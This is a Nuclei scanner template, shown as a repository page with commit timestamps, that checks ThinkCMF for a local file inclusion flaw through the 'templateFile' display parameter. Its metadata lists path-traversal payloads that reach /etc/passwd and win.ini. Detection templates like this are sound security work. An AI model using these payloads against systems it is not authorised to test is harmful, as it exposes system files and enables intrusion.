nuclei-templates/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml

32 lines
651 B
YAML
Raw Normal View History

2021-02-11 15:46:20 +00:00
id: thinkcmf-lfi
info:
name: ThinkCMF LFI
author: pikpikcu
severity: high
reference:
- https://www.freebuf.com/vuls/217586.html
2021-09-30 14:52:53 +00:00
metadata:
win-payload: ../../../../../../../../../../../../../../../../windows/win.ini
unix-payload: ../../../../../../../../../../../../../../../../etc/passwd
tags: thinkcmf,lfi
2021-02-11 15:46:20 +00:00
requests:
- method: GET
path:
2021-09-30 14:52:53 +00:00
- "{{BaseURL}}/?a=display&templateFile=README.md"
2021-02-11 15:46:20 +00:00
matchers-condition: and
matchers:
2021-02-12 04:59:05 +00:00
2021-09-30 14:52:53 +00:00
- type: word
condition: and
words:
- "ThinkCMF"
- "## README"
- "## UPDATE"
2021-02-11 15:46:20 +00:00
- type: status
status:
- 200